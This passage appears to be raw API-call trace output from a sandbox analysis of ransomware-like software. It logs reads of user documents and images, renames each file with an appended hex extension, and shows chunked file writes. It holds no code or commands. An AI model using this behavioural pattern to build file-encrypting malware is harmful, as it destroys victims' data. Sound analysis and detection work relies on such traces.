hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.479] RtlInterlockedCompareExchange64 () returned 0x1 [0166.479] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.483] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.483] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.485] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.487] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt", lpString2=".F0D6DF2FCEA3233E00719DC8472667C4B719AB1658C496EEC0419148103EFF19" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt.F0D6DF2FCEA3233E00719DC8472667C4B719AB1658C496EEC0419148103EFF19") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt.F0D6DF2FCEA3233E00719DC8472667C4B719AB1658C496EEC0419148103EFF19" [0166.487] GetProcessHeap () returned 0x270000 [0166.487] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x741cf38 [0166.487] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741cf38, Length=0x122, FileInformationClass=0xa) returned 0x0 [0166.489] CloseHandle 
(hObject=0x5ac) returned 1 [0166.490] GetProcessHeap () returned 0x270000 [0166.492] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.493] RtlInterlockedCompareExchange64 () returned 0x1 [0166.493] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.499] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.500] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.502] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.503] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg", lpString2=".2E6F0E476F20C1FEBD0F5A1E18589A384011D79847921AC86C063C7C1E16BF09" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg.2E6F0E476F20C1FEBD0F5A1E18589A384011D79847921AC86C063C7C1E16BF09") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg.2E6F0E476F20C1FEBD0F5A1E18589A384011D79847921AC86C063C7C1E16BF09" [0166.503] GetProcessHeap () returned 0x270000 [0166.503] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x42f89a8 [0166.504] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f89a8, 
Length=0x116, FileInformationClass=0xa) returned 0x0 [0166.505] CloseHandle (hObject=0x5ac) returned 1 [0166.507] GetProcessHeap () returned 0x270000 [0166.510] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.510] RtlInterlockedCompareExchange64 () returned 0x1 [0166.510] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.515] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x3600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.515] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.517] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.518] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls", lpString2=".128535490CA19BD8D6EF7393AC322A47535172947026BF2E64660F7AFEBED62F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls.128535490CA19BD8D6EF7393AC322A47535172947026BF2E64660F7AFEBED62F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls.128535490CA19BD8D6EF7393AC322A47535172947026BF2E64660F7AFEBED62F" [0166.519] GetProcessHeap () returned 0x270000 [0166.519] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f8ad0 [0166.519] NtSetInformationFile 
(FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8ad0, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.521] CloseHandle (hObject=0x5ac) returned 1 [0166.522] GetProcessHeap () returned 0x270000 [0166.524] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.524] RtlInterlockedCompareExchange64 () returned 0x1 [0166.524] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.536] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.537] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.540] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.541] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx", lpString2=".1452281CB74E56FB5D9C0D928C10603F75194522CE72EA094B839B338307FB33" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx.1452281CB74E56FB5D9C0D928C10603F75194522CE72EA094B839B338307FB33") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx.1452281CB74E56FB5D9C0D928C10603F75194522CE72EA094B839B338307FB33" [0166.541] GetProcessHeap () returned 0x270000 [0166.541] 
RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x741d070 [0166.541] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741d070, Length=0x128, FileInformationClass=0xa) returned 0x0 [0166.544] CloseHandle (hObject=0x5ac) returned 1 [0166.545] GetProcessHeap () returned 0x270000 [0166.546] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.546] RtlInterlockedCompareExchange64 () returned 0x1 [0166.546] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.551] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x7400, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.551] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.553] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.554] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx", lpString2=".FD5E92539DED149341A01BD0BC1BBE6BC306172640CCF6C18BD2024D39CC4E62" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx.FD5E92539DED149341A01BD0BC1BBE6BC306172640CCF6C18BD2024D39CC4E62") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx.FD5E92539DED149341A01BD0BC1BBE6BC306172640CCF6C18BD2024D39CC4E62" [0166.554] GetProcessHeap () returned 0x270000 [0166.554] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x741d1a8 [0166.555] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741d1a8, Length=0x128, FileInformationClass=0xa) returned 0x0 [0166.557] CloseHandle (hObject=0x5ac) returned 1 [0166.557] GetProcessHeap () returned 0x270000 [0166.559] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.559] RtlInterlockedCompareExchange64 () returned 0x1 [0166.559] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.563] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.564] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.566] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.567] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx", lpString2=".F7C9DFB4C0F2B79134F257A645B8A1E3A6BE47C470043AC26E8DBC6812F9AA09" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx.F7C9DFB4C0F2B79134F257A645B8A1E3A6BE47C470043AC26E8DBC6812F9AA09") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx.F7C9DFB4C0F2B79134F257A645B8A1E3A6BE47C470043AC26E8DBC6812F9AA09" [0166.568] GetProcessHeap () returned 0x270000 [0166.568] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x42f8bf8 [0166.568] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8bf8, Length=0x120, FileInformationClass=0xa) returned 0x0 [0166.569] CloseHandle (hObject=0x5ac) returned 1 [0166.571] GetProcessHeap () returned 0x270000 [0166.572] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.572] RtlInterlockedCompareExchange64 () returned 0x1 [0166.572] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.577] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.577] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.579] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.580] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx", lpString2=".BBB1E6666D48DD04E8F037904DAA375E5C0D7A30BF1BEC5BFC2AFCCB3AE4767C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx.BBB1E6666D48DD04E8F037904DAA375E5C0D7A30BF1BEC5BFC2AFCCB3AE4767C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx.BBB1E6666D48DD04E8F037904DAA375E5C0D7A30BF1BEC5BFC2AFCCB3AE4767C" [0166.581] GetProcessHeap () returned 0x270000 [0166.581] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x42f8d20 [0166.581] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8d20, Length=0x120, FileInformationClass=0xa) returned 0x0 [0166.583] CloseHandle (hObject=0x5ac) returned 1 [0166.584] GetProcessHeap () returned 0x270000 [0166.586] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.586] RtlInterlockedCompareExchange64 () returned 0x1 [0166.586] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.594] ReadFile (in: hFile=0x5b0, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.594] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.595] WriteFile (in: hFile=0x5b0, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: 
lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.597] RtlInterlockedCompareExchange64 () returned 0x0 [0166.597] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.611] WriteFile (in: hFile=0x5b0, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.612] RtlInterlockedCompareExchange64 () returned 0x0 [0166.612] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.624] WriteFile (in: hFile=0x5b0, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x4200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.625] RtlInterlockedCompareExchange64 () returned 0x0 [0166.625] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.639] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.641] RtlInterlockedCompareExchange64 () returned 0x0 [0166.641] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, 
lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.652] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.654] RtlInterlockedCompareExchange64 () returned 0x0 [0166.654] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.667] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.669] RtlInterlockedCompareExchange64 () returned 0x0 [0166.669] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.680] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x5600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.681] RtlInterlockedCompareExchange64 () returned 0x0 [0166.681] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.701] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, 
nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.703] RtlInterlockedCompareExchange64 () returned 0x0 [0166.703] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.715] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.717] RtlInterlockedCompareExchange64 () returned 0x0 [0166.717] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.732] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x6800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.734] RtlInterlockedCompareExchange64 () returned 0x0 [0166.734] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.747] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.748] RtlInterlockedCompareExchange64 () returned 0x0 [0166.748] GetQueuedCompletionStatus 
(in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.759] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.760] RtlInterlockedCompareExchange64 () returned 0x0 [0166.760] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.770] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.771] RtlInterlockedCompareExchange64 () returned 0x0 [0166.771] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.786] WriteFile (in: hFile=0x5b0, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.788] RtlInterlockedCompareExchange64 () returned 0x0 [0166.789] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.802] 
WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.805] RtlInterlockedCompareExchange64 () returned 0x0 [0166.805] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.816] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.817] RtlInterlockedCompareExchange64 () returned 0x0 [0166.818] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.846] WriteFile (in: hFile=0x598, 